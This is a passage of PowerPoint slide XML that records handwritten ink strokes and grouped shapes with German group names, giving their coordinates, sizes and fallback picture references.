              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3485086" y="2800394"/>
                <a:ext cx="1767600" cy="28368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76446" y="2791754"/>
                  <a:ext cx="1785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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5098966" y="2873474"/>
                <a:ext cx="236880" cy="270000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89966" y="2864834"/>
                  <a:ext cx="254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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3384286" y="2604194"/>
                <a:ext cx="132120" cy="199800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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75286" y="2595194"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3613246" y="2743514"/>
                <a:ext cx="4320" cy="6840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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604246" y="2734874"/>
                  <a:ext cx="2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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3690646" y="2577914"/>
                <a:ext cx="43200" cy="129240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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82006" y="2568914"/>
                  <a:ext cx="60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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3656446" y="2530754"/>
                <a:ext cx="176040" cy="191520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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47806" y="2521754"/>
                  <a:ext cx="193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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3884686" y="2580074"/>
                <a:ext cx="74160" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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876046" y="2571074"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3981526" y="2581514"/>
                <a:ext cx="123480" cy="70920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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72886" y="2572874"/>
                  <a:ext cx="141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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4137406" y="2528234"/>
                <a:ext cx="112680" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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28406" y="2519594"/>
                  <a:ext cx="130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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4290406" y="2521034"/>
                <a:ext cx="79560" cy="84960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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281406" y="2512394"/>
                  <a:ext cx="97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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377166" y="2539034"/>
                <a:ext cx="113040" cy="80640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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68166" y="2530394"/>
                  <a:ext cx="130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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4551766" y="2451194"/>
                <a:ext cx="225360" cy="194400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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43126" y="2442554"/>
                  <a:ext cx="243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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4598566" y="2558474"/>
                <a:ext cx="109080" cy="19800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89566" y="2549834"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4809166" y="2547314"/>
                <a:ext cx="109800" cy="169200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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00166" y="2538314"/>
                  <a:ext cx="127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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4931926" y="2571794"/>
                <a:ext cx="132120" cy="151560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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923286" y="2562794"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5017246" y="2702474"/>
                <a:ext cx="11520" cy="6480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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08246" y="2693834"/>
                  <a:ext cx="291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4" name="Gruppieren 1153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC7B641-B3E1-4C34-9BE8-1B6E5DED0EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3453406" y="2163678"/>
            <a:ext cx="1801080" cy="264240"/>
            <a:chOff x="3453406" y="3382874"/>
            <a:chExt cx="18010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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3508486" y="3419594"/>
                <a:ext cx="1746000" cy="227520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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499486" y="3410954"/>
                  <a:ext cx="1763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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3453406" y="3382874"/>
                <a:ext cx="264240" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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444406" y="3374234"/>
                  <a:ext cx="2818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3" name="Gruppieren 1152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71BDADD-765D-4DED-B435-D99857DE7324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3454846" y="2405238"/>
            <a:ext cx="2040120" cy="342000"/>
            <a:chOff x="3454846" y="3624434"/>
            <a:chExt cx="20401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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3454846" y="3668354"/>
                <a:ext cx="131400" cy="247320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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445846" y="3659714"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3640246" y="3900194"/>
                <a:ext cx="360" cy="2520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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631606" y="3891194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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3706126" y="3784634"/>
                <a:ext cx="28440" cy="150840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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97486" y="3775634"/>
                  <a:ext cx="46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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3683086" y="3714794"/>
                <a:ext cx="210960" cy="165600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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674086" y="3705794"/>
                  <a:ext cx="228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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3912046" y="3813074"/>
                <a:ext cx="128160" cy="107280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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903406" y="3804074"/>
                  <a:ext cx="145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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4015366" y="3754034"/>
                <a:ext cx="83160" cy="177120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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06366" y="3745034"/>
                  <a:ext cx="100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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4139926" y="3851954"/>
                <a:ext cx="59400" cy="81360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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31286" y="3842954"/>
                  <a:ext cx="77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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4241446" y="3873914"/>
                <a:ext cx="27360" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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32806" y="3865274"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4226326" y="3779594"/>
                <a:ext cx="19440" cy="31680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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17686" y="3770594"/>
                  <a:ext cx="37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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4282126" y="3865994"/>
                <a:ext cx="83880" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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73126" y="3856994"/>
                  <a:ext cx="101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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377526" y="3852314"/>
                <a:ext cx="85680" cy="96480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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68526" y="3843314"/>
                  <a:ext cx="103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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4487326" y="3826034"/>
                <a:ext cx="111600" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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78326" y="3817034"/>
                  <a:ext cx="129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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4714846" y="3786794"/>
                <a:ext cx="27720" cy="164160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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706206" y="3777794"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4695406" y="3724154"/>
                <a:ext cx="125640" cy="113040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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686766" y="3715154"/>
                  <a:ext cx="143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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4803766" y="3836834"/>
                <a:ext cx="132120" cy="70560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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794766" y="3828194"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4955326" y="3810554"/>
                <a:ext cx="89280" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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46686" y="3801914"/>
                  <a:ext cx="106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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5044606" y="3714434"/>
                <a:ext cx="54720" cy="159840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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035606" y="3705434"/>
                  <a:ext cx="72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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5102926" y="3786794"/>
                <a:ext cx="70560" cy="53280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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093926" y="3778154"/>
                  <a:ext cx="88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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5211286" y="3749354"/>
                <a:ext cx="101160" cy="76320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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202646" y="3740714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5316046" y="3706514"/>
                <a:ext cx="109080" cy="93600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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07406" y="3697874"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5339446" y="3624434"/>
                <a:ext cx="155520" cy="153000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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330446" y="3615434"/>
                  <a:ext cx="1731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2" name="Gruppieren 1151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA7DEBB-69B3-4AEF-8FA2-4E1D5B9AF097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1905766" y="2674518"/>
            <a:ext cx="796320" cy="438840"/>
            <a:chOff x="1905766" y="3893714"/>
            <a:chExt cx="79632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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1927366" y="3893714"/>
                <a:ext cx="662040" cy="188640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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918726" y="3884714"/>
                  <a:ext cx="679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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2445406" y="3951314"/>
                <a:ext cx="256680" cy="109800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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36766" y="3942314"/>
                  <a:ext cx="274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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1933486" y="4111874"/>
                <a:ext cx="678600" cy="220680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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924486" y="4102874"/>
                  <a:ext cx="696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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1905766" y="4185314"/>
                <a:ext cx="183240" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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96766" y="4176674"/>
                  <a:ext cx="2008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1" name="Gruppieren 1150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D186CA7A-2A92-46D2-BA6B-7E5E81E18832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1389518" y="3198749"/>
            <a:ext cx="1976040" cy="338400"/>
            <a:chOff x="1707406" y="4351994"/>
            <a:chExt cx="19760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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1707406" y="4406354"/>
                <a:ext cx="102240" cy="148680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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698406" y="4397714"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1828726" y="4491314"/>
                <a:ext cx="20880" cy="95760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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819726" y="4482314"/>
                  <a:ext cx="3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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1914046" y="4588514"/>
                <a:ext cx="11880" cy="14040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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905046" y="4579874"/>
                  <a:ext cx="29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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2032126" y="4462514"/>
                <a:ext cx="21960" cy="120960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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023126" y="4453874"/>
                  <a:ext cx="39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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2010886" y="4417154"/>
                <a:ext cx="89640" cy="26640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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002246" y="4408514"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2034286" y="4534874"/>
                <a:ext cx="92880" cy="9360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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25646" y="4526234"/>
                  <a:ext cx="110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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2067046" y="4585634"/>
                <a:ext cx="102600" cy="26280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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58046" y="4576994"/>
                  <a:ext cx="120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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2166046" y="4536674"/>
                <a:ext cx="105120" cy="73080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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57406" y="4528034"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2169646" y="4503914"/>
                <a:ext cx="101520" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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61006" y="4495274"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2298166" y="4492754"/>
                <a:ext cx="105120" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89166" y="4484114"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2406526" y="4483394"/>
                <a:ext cx="101520" cy="101520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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97886" y="4474754"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2604526" y="4576274"/>
                <a:ext cx="3960" cy="2880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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95526" y="4567274"/>
                  <a:ext cx="21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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2650966" y="4399154"/>
                <a:ext cx="23760" cy="162720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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42326" y="4390514"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2608486" y="4353074"/>
                <a:ext cx="157680" cy="121320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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99486" y="4344074"/>
                  <a:ext cx="175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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2763646" y="4449554"/>
                <a:ext cx="117000" cy="112680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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54646" y="4440914"/>
                  <a:ext cx="134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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2879926" y="4456394"/>
                <a:ext cx="66240" cy="122400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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71286" y="4447394"/>
                  <a:ext cx="83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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2957686" y="4486994"/>
                <a:ext cx="81720" cy="72360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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48686" y="4478354"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3014926" y="4475834"/>
                <a:ext cx="60480" cy="214560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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06286" y="4466834"/>
                  <a:ext cx="78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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3147766" y="4351994"/>
                <a:ext cx="62280" cy="198360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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38766" y="4342994"/>
                  <a:ext cx="79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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3229126" y="4448114"/>
                <a:ext cx="97200" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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20126" y="4439474"/>
                  <a:ext cx="114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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3364846" y="4448474"/>
                <a:ext cx="89640" cy="77760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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56206" y="4439474"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3473206" y="4437314"/>
                <a:ext cx="27720" cy="88560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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64206" y="4428674"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3558886" y="4434794"/>
                <a:ext cx="90720" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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49886" y="4425794"/>
                  <a:ext cx="108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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3648166" y="4356314"/>
                <a:ext cx="35280" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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39166" y="4347314"/>
                  <a:ext cx="52920" cy="17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55" name="Gewitterblitz 1154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D101A79-6171-4747-A541-8749CBC47EF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2655851" y="2564178"/>
            <a:ext cx="365778" cy="40932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3F6666C-8C90-4020-9E49-B10E4036D0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId264"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
